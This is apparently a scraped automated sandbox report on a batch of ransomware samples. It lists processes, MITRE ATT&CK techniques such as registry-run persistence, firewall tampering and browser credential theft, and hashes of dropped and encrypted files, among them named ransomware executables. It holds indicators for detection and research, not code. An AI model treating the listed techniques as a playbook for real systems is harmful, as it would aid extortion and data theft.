- Suspicious use of SetWindowsHookEx
PID:6856
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5796
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00439\!ENCRYPT_NOTICE.log1⤵PID:3420
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1SIP and Trust Provider Hijacking
1System Binary Proxy Execution
2InstallUtil
1Regsvcs/Regasm
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD50c77b895bf1983b459064a798131b92b
SHA19547d5ee82ace817c15a4531f2cb7981d543e01f
SHA25655d2cc611e381f91d623a52d1e757fb00e06cfe54a58e8cd2f0cd35232f995f6
SHA51272f9735bf767b594cccd6035b2c385fda404b674882d062981c79ba2d090ae963a325dadb07bfb187bb874b09bf403ffae43102e4c59f92a8e2141d776297b56
-
Filesize
8B
MD5c401dab7b38f2df21172a3db341ca7c1
SHA1335900c8365e67b6cd8f3032cababb5a2ba2cc31
SHA25674bffbe0ad126f7aad54241e0379cfee55ddf8f843f59d7b1fbf78f6c8814989
SHA5128c97776bab768b1de5f4b8709990122c575f12f60212f2555d1f2ff5d72851cae155f1e3174008b98678b019c6aab9d1a3e93be67ed680e5b0b283cda414aef1
-
Filesize
8B
MD50785645805d37c959eb23225e361a3f1
SHA109cfeaa1435333e701482d3ab92827c3c489a03d
SHA256b54b1a339e9f1b672af88b397362d05c99e30d790835dbfd74fc9117a6de76d3
SHA512fce46076a2ebf4f1dd43c9169564ab137e64d803680eb132814c71da9ede39632fb65a28543441cfceacdf2a80ab4a6ebcc4bce1c141ac874039e2470891a12c
-
Filesize
8B
MD5d650e3091f736b71ef51d0a532e2c29c
SHA17e47b8e4d552470f6d8fd78693f09ea115da32be
SHA25641b8f24b79ae38bb5f3af44cf187d022c20517a6f576791e466d536517b68fb9
SHA51294339fc32c2e50271d2310aa04ed030688b3ad42b155276c736e1b791c22fca2f4e38dd540bd763c9e55a39c4579188e443f04f9787946145541aba6af260e46
-
Filesize
8B
MD5261d34d6d9be414ea56b1000ea18ea4e
SHA155e540c9eb925a82dcb8c2afaa65804c208472e7
SHA25646386ff0eccd7a7871daa3122b418bbf8e0d0180eca74808a53b2c3ed970f50e
SHA512a1acbc0867c61d804cb23ba36dd2705952d5a6636c06202514b0cff407a665881f297c21542489faa9c458d19bbf694d17de98bf9a9561a65f1ee5c8ff25a362
-
Filesize
3B
MD5918499f78f9473ace591bed8f8848227
SHA17e0a88ec285d5910a64493d477e8cfddd303c8b0
SHA256840f8cebce5b0868f97dbb1984ea0efcb8fd96181ed539ce12509b3532eb90b6
SHA51273f4719e11adc15dc8abe7d6eea4acbf30799e58610db738290d7065640bac798438068f1c63c28391e3351e8f93fbfa26be0c0b723ba45173dace3f403e8001
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
8B
MD57dea362b3fac8e00956a4952a3d4f474
SHA105fe405753166f125559e7c9ac558654f107c7e9
SHA256af5570f5a1810b7af78caf4bc70a660f0df51e42baf91d4de5b2328de0e83dfc
SHA5121b7409ccf0d5a34d3a77eaabfa9fe27427655be9297127ee9522aa1bf4046d4f945983678169cb1a7348edcac47ef0d9e2c924130e5bcc5f0d94937852c42f1b
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.encryptSIZE
Filesize8B
MD504799f9fc5e0c2abed37a302c81cb3cb
SHA1047623cdfa3dbc90fcd25d2b7b974f2a80344d6d
SHA2564c6d7e0c6891e6a9fa287ec16b85caf8bc7b4cf40e3d750591fb47e7e0403a9b
SHA5129f7068188ff8a299831603a1ef66137760b74ca1f2698eb5204deb5b0551efa0f7054628464f69597f705be241710251828d485f835925854841420affdaa0ce
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.encrypt
Filesize8KB
MD5023007f45a7cf680505792051af6d70d
SHA1b39917e0c817bbd251848edec51fb1e3ac9d7f5d
SHA256ee43a0ceaf10be4e8925ce1e19dd6ccef855ab40f0d7d10cb0baa3de68b8a590
SHA512d7eafcb73011ff95a710df20720a54e9ae01217a491b2a4ff7dcbf5b0f4780587388f83018b6c72260852b71ed167b7efa4d8b696135bb171521a8650d24af01
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{372f50b1-6f3f-4bd5-850e-38c692f0cb5c}\0.2.filtertrie.intermediate.txt.encryptSIZE
Filesize8B
MD53e27b3aa6b89137cce48b3379a2a6610
SHA193ea9b45a7f52bd8e77c962b68f99efbb7df05e0
SHA256f13ee6ed54ea2aae9fc49a9faeb5da6e8ddef0e12ed5d30d35a624ae813e0485
SHA512470f585f2f412ca3807f9964685633350da6f920e3ea3ba834901ae26ea2a28ebbb7a6736e58a9022f41bc5a78be0e2b9767c26dc96477c93e6a94611e8ca181
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727658720680492.txt.encrypt
Filesize77KB
MD55a3a175addc21fc6a89773de0520909a
SHA1627adbe5211bbc72119ece54c24c4bd9a02e3929
SHA256630f31daf70bffde13edb92b65f5a49220d0dfda9ee9ce09a3e391b51ec6b8cd
SHA512582f483cbf5853da4bb988b3ff1ba37aaccfe1821ff08622ea1468847ea338252025ee35b45e21e1d4737f3c26a086fdc81e9d3521c7756794382551b866e28e
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727660257997193.txt.encrypt
Filesize47KB
MD5f06188c6acaf352de3d238364ce28c5b
SHA18949b910f496a0df62468d2fdd890f1467a9d93e
SHA2569247e3501d71708ccf573af3dfa90af003666d46cb2c139c50d2c235ae9db9e5
SHA512a04abbdef09f14fd639f122087cf114eac29d3bb3b7c773f1aad2cece1203fb1e212f14e830a2842963febf9e1e8c659e05789b6552b108bf46179ec56a36a90
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727666145703406.txt.encrypt
Filesize65KB
MD5b1cdc298e4a679299c8581c678df9d1d
SHA16399978f032e5984df88e99efd714ba9d09de758
SHA2561a1d09df66ca1f786ccc364de9e1229ecd77b35f159dd0b0c7a92281e8ac0ba1
SHA512509d0c05c0f08b84bc67a80e24d3065c2994febc475c4478fe5af6591ba918fe14a556fef5027bfe02ab4550de2b6c9bfa94b1a06234c85edf6dde596eef260d
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727667045505123.txt.encrypt
Filesize74KB
MD5018a79861372496b440f2c0ad1c9ba19
SHA1201c36e23aab323c8e3c7861d8684799f34703a6
SHA256ac57052510198d9ff361377b6137e7e81451304f57ed8c0754b54af33a4ef485
SHA5120be09f255e3827b9607d248e2549fa59f0493244147c9d80db94e2628b894099320efeebc29940f8642d037dee52170e51667fdcf1feebdb8e8026f0b9a19eec
-
Filesize
280B
MD5e48c5a50ebe306059ccd771c1cfd2543
SHA1401d053b323c12e72ba236edc0e9eafb8244f068
SHA2565ec7b64c79c63a0d2a92ee2cf13153b69ef5b439a7107d8963b5af90b669d8d9
SHA512f7d0d306504b96df61161703f5e66d44eaf6da435a84aee29902c84a860da8ae8b17b2a6560d72d12955ae7889da1d420e20cffc8612d3c4fc770686aa20ce92
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13.6MB
MD54261d8b1c138e0f4eb1e3385fc9456e0
SHA1c82affbf43d9e4c1cd5ea9d820f98127dccf365d
SHA256ff043a569595aa2638e892683973abc84d20e634b4f73ab6f7f946bfa97c374b
SHA512e615c82480c1922a421cb8913c2446590627522c52702a2e6be4b47e441b766d07e5786402b65da8b1f91fbb59737d1c049a7672490d05cecaeab0830515e12e
-
Filesize
76KB
MD50e362e7005823d0bec3719b902ed6d62
SHA1590d860b909804349e0cdc2f1662b37bd62f7463
SHA2562d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3
-
Filesize
59KB
MD5222e2f9072af7471881103e94716e857
SHA1de1ca2d06b80cabca8384c0f64ff924969f76b09
SHA25622fe13a454f73d73cb42ad4dd8c9d58aadb6f95549cf4eb1bc98df5d1c057855
SHA512126bd3bab91d35e34edec361fb9ce8f34be9ca92a70979443ef362cc97b6a8597764f0500c8d1c082b558ee611e6c1b918c41752108c1105f45142bfa3f0a50b
-
Filesize
8B
MD5edc8bf334f0c9a2129c5b8c8ab135012
SHA1cf27c7e420e7a1e75e0a8981d40899c1573a7cc4
SHA2569cc9d309c9e1dc0433795c07d4015c04ee09b699b0e5da81f7b346d24538bfba
SHA51298171dd63d3a003f1ff11613a1c98e99667bb196c4c0953e6ba0f4c28213add23c0212e30d67b2070fc09eeb46e751ddafd7e55c91eb65c0daaf10e5ed565361
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe
Filesize908KB
MD55cf7843b7bf6a27ff84c42f0c8c9e6e0
SHA1e878430aca070b4001227281fc578d3e2c122d58
SHA2560248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141
SHA512fc34cf4808b56779c84a4bf9ae16332ee69bf3ac07f1ce4853bef330127e6fc08ffce81cea7b215103fa0e7e394f0b70ab2b696008613ee4778750e126d4df35
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe
Filesize1.9MB
MD5b4c23d3fc19cbe037fc5895feb4d38dd
SHA162eabb8cbe9dbb31ff9f9df6cb74cdbd7cbb5ee8
SHA256119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493
SHA5126b80bbc05c6ce46251594f723251e4b0cfbe069b658b2e0ba11b4f157faa472ce099244e042bd8260faeb0897ec902a045bd0bab416ea23a9b73d17a75b993df
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe
Filesize195KB
MD51813f47dfb7f2177d8528ac7040ce1b4
SHA1aff5dc9efc0d3bd69f07c1e89034d769b1d327a9
SHA2562860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21
SHA512c76bf0c228c59b2ca0bebb6321f184df97f0a6f73bccb17612d42b6a29a81c064c43791c257aff1b6617ad65dcadc19b130232f7420709760afe35b1c2d5188e
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe
Filesize159KB
MD578cf6f7b9aabe1863622b1fc38ab7aff
SHA11e8c4ec641b01ad1748a253967b9e48a20cce1d0
SHA256466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34
SHA512632c53a8d12281122ff04c5b7cc86ee6b24015688b977ce202d4609556d2bec8c07090c890805228eef803f61369dbb6b51c9232fa2ef72d0903df960782c475
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe
Filesize1.9MB
MD522966ca8e4c54aa1fafe665b2e9cf82b
SHA10f8bc626d9c35de44e91e84fb20fa4f6915239b0
SHA256a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5
SHA5122019b4c4ed4f192ca77324d55221dfc3f12fa8d7e0984c403f68bcf9fde31fdcee75886da1829732dd4a222552b9c6e34075a5ad358edcf5b9e2af433c1f676f
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe
Filesize662KB
MD5038374d56d6030764c76cb2161ce396d
SHA1e8310c7b8a11b9f7d5ee1c9fdb2c01a09b48b427
SHA256d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7
SHA51223c311c6e0263a38561cd8db892fc41752fa06b3392709c1484f0fc4d5c5240b3694b8fe82fff54bf3c510f7d88444913ac66b866fc04765a6b89cab3199aebb
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe
Filesize5.4MB
MD5abbfc619157ceb0f29a31b2ab20a7f4e
SHA1a97bf834886eabd3d8d465b896ded0543b4912fc
SHA256e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f
SHA51276fa634720c6b1bf389790c7654650eae38e921b2969e1a37f05ab73be1351bf7b313c67152c50b664004aa197b878227384614351733a0cfbc63e97eda4b43f
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe
Filesize2.7MB
MD59ea014c2c1092dda8cdec216d18240fa
SHA126110303b15cf813c911c18a3cca945f2d221ce1
SHA256ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5
SHA512493451fde239d3b2fcaa72202ce9a286fcf2da4065f53d60164215e1f6234a3d04b7acc419076ff09c4c246f80b05ec362b43890db2798ca9884e6d029e0d67b
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe
Filesize372KB
MD5cee75b4e24ecdafbd0c43e7f55e50d0a
SHA1a1b25f51e2b09c647aed05a092eadba9349d5cda
SHA256fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435
SHA512d3bcc1222d99ffd494c2db57769ff34a7f6c3b0340053b7e7db34128aa3bbe468a5227670b43dc4ac4a31480df9e0309e622243f0a74d9a0cf11238466f8b903
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe
Filesize154KB
MD5e577691b61c350bc205eced92c0541ce
SHA167fdd7b4c0173147dc0cea485e229f19d29d6625
SHA256659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5
SHA512492ab3afee05e6135a39bca02dff08447bfec9d171d84823fa6ebdeb787cc90d745614e809fe1836aa2b0b3bed13934e3b51f5f615fcc91d1ed8dbab9bc76959
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a0b29b3b4d93d336a4e5f5efa601f6820cb19c0b0c2123436a338ee3acaf9e3e.exe
Filesize255KB
MD5a903ddbc82336974dfb5c064c994b048
SHA1ec939f803f852c06b3f9ede10dcf5ef40a1cc409
SHA256a0b29b3b4d93d336a4e5f5efa601f6820cb19c0b0c2123436a338ee3acaf9e3e
SHA5120b90557ff033fc8acb5e393250f3e99523296f371ee3467ac680ffdacd13b15c5845c61e94e00c3c708fbd5dccb1261b65e215e4c68f857536ee11ee0b82cb0f
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe
Filesize2.3MB
MD5b14edfa3cf01b4cb5c4f0271fc8212b5
SHA13cc28bd1059782968f2f40ef62a2be0297341bdb
SHA256fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e
SHA5121db59496c4698c06efd4ccd067083ece0beeba642a17028a953c90bde70ae9bfff756ccbb15cd4fc542496c3d45c3db2d0f73a1f01d9cebe3049eaa32a40afa0
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe
Filesize993KB
MD5876e21d9334ffdc81d43faa974ff8c9d
SHA13727c44568e260217528335437023f6dffab7228
SHA256220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494
SHA5125595d8b4a837e9d69125c96f5c3dfdf00793d3a2f61d710808521b4882532da740f339a7d07ee161731bc8b55649dcc4bdd53403e2d54d13977024ff75af2a2a
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe
Filesize188KB
MD5c517814e6db327dc3b65ac7be3ff4132
SHA1b078329202083de65328be8c591ab9bae0a6b08a
SHA256797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46
SHA5125a197b8169079150222c0fb86baf507bfe9b4ef59f0f6a89cf6e9f3b1eba4df4b30743b716cdbac25a715556a19beae8e8e58d0b8da7f4be93f71fdaba568dca
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe
Filesize97KB
MD554c53fda2eaf614078015b0e8d6f37e8
SHA1b9d2c0f684679c5ab24d617fc785e2babef7fdc9
SHA2560153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31
SHA512eb969640e180d0baaa8f04ba934bab49c873aa5251dc49b9f64d7e5b987e4355c96c8a584b217739c54cae99c4ba517008046fef035dbe291d23885cafa7fd3e
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe
Filesize391KB
MD597be6fea4562b8a67768424b655fabb3
SHA126abad4c3ac1e626b1b8e54eb1ef0d8db7717c67
SHA256a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca
SHA512980989a438fbdd40dc9afa06ae16a87c764c04ebcc521bb706a40f5a8045212c77b13d61b3a3eb2b6300fe2578fea5977ebb7174ba224085c960fee871b84e06
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe
Filesize472KB
MD50fd92f8bb9d03c17b167704619e52c19
SHA1b492bfa53f9bd78a6353ac0905fb67b24f6bec5d
SHA256dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09
SHA512941779de49e3aac88826736583b9062efa172779cd3506a15a9908bcc53631f5567a26b2a29fe5791502039b4cb4d14cb366b4e2e4866117fb9cabb4636681db
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exe
Filesize1.7MB
MD5020fdbc6245c8d30b006ea9a140f04d6
SHA140e2e172ee73abcd0f6cacd8df758e26b4e8ae4a
SHA256bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8
SHA5120c949da632763177a280b39761aec28483640318d43f27979779c162db92b9f5b6c25ff5ba122491f7eb30ba9ccf6ac845107412d64863b3cf7d3d762ca1f284
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe
Filesize12.5MB
MD5e4b1e48506af249d728da24af2a604ab
SHA1c56fbf78d366d10d0b4f769ad81e730df9d234ab
SHA256f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80
SHA5121c2793bbde4ec21e1262b6036a814acb6b12d53b886ab09d1be328277ed3e5cdf12001458adbe871b1be4ad4903bd9f8bccbfdf9c34d8d0f42c22d07ab3f5192
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe
Filesize187KB
MD56ced1198d39ba5256b289e83eac43a51
SHA12480f9b0eb7dffcb78454807e50fbe38fd5dab91
SHA256d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7
SHA5122db92f339f74a01ede60bc6107a1522f302471c13aafc54e17fb2fceff2454ab1fde26f369b4e61ac40e77c91e6b83cb99910a1f65ddff3418c731e812318232
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe
Filesize913KB
MD5040696ac44a94479aa0c342366d82fe2
SHA1002bf5085a7ee574b74c900b917114f17db502a0
SHA256941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71
SHA512cc7a322c8746b654e7360b996f35048a30b37b13e10aa6177c1285d508f7fe32b458a7864ef16bf7b2642f941c897c38fbf1707b4cbd233c3a40d9c1d7a88e94
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
Filesize3.8MB
MD5d88e31f188a7c380fdcaeb8327de9a98
SHA17c0603d4e4bfd7a9fa45e12acd3ed8563e10c890
SHA256d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a
SHA512d7742c365ce203d1284fb7fb43aef1dfdc1a2d511e62f42b51018b7331fea4677dcef67493d4cc015106e544451278fbcd1857596ea275c48ccc02ab5af2385f
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-372b7d29950ffb48503d2418fd9491d60bdf32dc02465cc0d04a1dc3a951d7aa.exe
Filesize647KB
MD5143c35d9466787dc46826408d455055f
SHA15117f33d6b8b42729cad1c3a9f68447c8c09df76
SHA2566f1d68df36ffa447b201050198593f1dbcf0f754707c868b99552f4926929f2e
SHA5125bd76e87ea708229ba43e61fc5342dc03279c8608d7663697d5fa658ada41fb1c20534489997103db9f03c53fc81028e91117c0b0f59a1f46a98a1154c3ed861
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ed8e4743f73b1ca30d53cedff03d6871d1a5a3ae6ed8c60a2dffee5f745f3817.exe
Filesize730KB
MD59cb0ef3bf13dcd5fd0c59f9a25e12aee
SHA1b8899fbacf2be4cde279837e49ee7bce2547ffa4
SHA25695d2d2bcc6fc2ea712a7ab28f5ddda884a065ea84e3f4621069762f5065616e3
SHA512d7df4141b35cf697a1b0e37b633b0af5914d5e2d2d2d7d1bd686d8db9dec16cdc97cd5dc1d8b98f9cc18bedd2c5ec01c83666a39911b9ad8f9cf5b49adefa3c4
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Generic-3dfbdb757a36a46147ef5c53c2761f779a9896481a9d3b3effc4373ddc12f5ef.exe
Filesize331KB
MD5dd701fe9fa3bce2976294d4e52b5fc6b
SHA133d57538883f7958fcf257badc07b659be5ba755
SHA256bcbce58effc1decfeec4f8a7b298b66025cf9a6c45ae5956104b4c90fd3a2e94
SHA512f46ad5ed0c25febc0529fa2642999f737cd2a642c65e3c37e7485ea3acb7b320e4ffc1bb827f32bf3e21f184db4ec57239a34542d1c4d867aca3038835e47697
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Generic-7ca57576c6a2d7dbf49faeafd4804c6b86d9af7fff1390c58a30eb9d9bf2fbfd.exe
Filesize456KB
MD5a928a31ec4daac85eec9b580836c5cc9
SHA1deb6b690dc725d81997ae10a8b50e354cf35b4de
SHA25630c9d3a51e67cc8f3950222202a1fed105ee4744388fe004607934fadb9796a7
SHA51229b3a03952bf2d9387dc5ab1366dbdeb232a4367827725a4582c13bfb7ece2b514a6331665cbd8e40f1eaa7ed9fea4db1fb3cfd6da74c3d6217d9f3eb967422a
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Generic-8e98c2dbb6c9fccebaca440ac922aada5609ee6550bc965da5124d262bef4e49.exe
Filesize2.0MB
MD5815158806c711274653a3db56b32b324
SHA1fd105af08f20ccb946a53dd1e4fd445a98be2d8e
SHA256045c5831c99bd13b4c0aef4f3c284ce1736c15dfaf82a8d0975eb9f721209770
SHA5120a548c2aef99ff1dd711901ac6f9f16e92e02d7d593543284ef620f24d27d21aafe291b8330018b9ae0c1d1cf3e0a9880bccd0be9c1147c2ff80e01bed91dda1
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Generic-b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.exe
Filesize618KB
MD5e9ca4d995bb0c4808aaeb70f6a907aac
SHA15b555a1badf54b1a53d2c880e5ec4f589da83757
SHA2560390afc52398b4473a1811cc51fd202c591f15655850adea6e8650b4beb06605
SHA51286b31b412089831fe298ce1f126c62ffa3dfe18ea4c34ca037c1fc33ef9f0a48cd61d2c0ec0b0936ed1516ab5505f58ca454d67f81a3b26af9c057cdb3497f91
-
C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Generic-c1819043839dddcca0b5de3d438cffb67c79dc26e811e97e65f13d89845cc969.exe
Filesize9.3MB
MD54658d0212789e97b29b4f86322e014ed
SHA1e5b9a2a9377c11603b401cf1257d1c152b921acb
SHA256454b05d84e743d467a7fda281711578a2a2ae6601a61088c343f18362f10a577
SHA512de5078351f22a3d24ccde04ac1acfb969fbfc597a549268352554044d224f6e8f754ca66bfd39e86ed054188a78a316d2a06eb35d18a347039ecebda85d038d8
-
Filesize
87B
MD501e25447115f9c1f8475ee19d7952073
SHA12306abe0ab93f6a0d5149a5663fe29b36927f4ca
SHA25603de79b2fa984ebe20f61c0e1f97f41027a95ce54266baffcfa77d5bf07b9f63
SHA512052380513952dc1867132109d073ffeef9c803216163f807c2b8ca582f4d0a1d968515882142b909297d0328f19992017e3ae1194ee95ff284a4d1c2374710a8
-
Filesize
24B
MD580f35caafbdd516278cec05d784d795b
SHA14f9045e3c73c12cac643f74b6e15adb99ebadf1e
SHA2568ecd42de9b0cd9a632e450dc28501e71c51330979b728c808f801fa9553129e5
SHA5121f10e9f3cefcf8b353963ee495a2cb7ec1cb81ade07438f0297727c9adc5e8e371fbe34f8a6159c59170c66562ff61bbf1c0eb1a6b49a885bc4b1160b321c1d5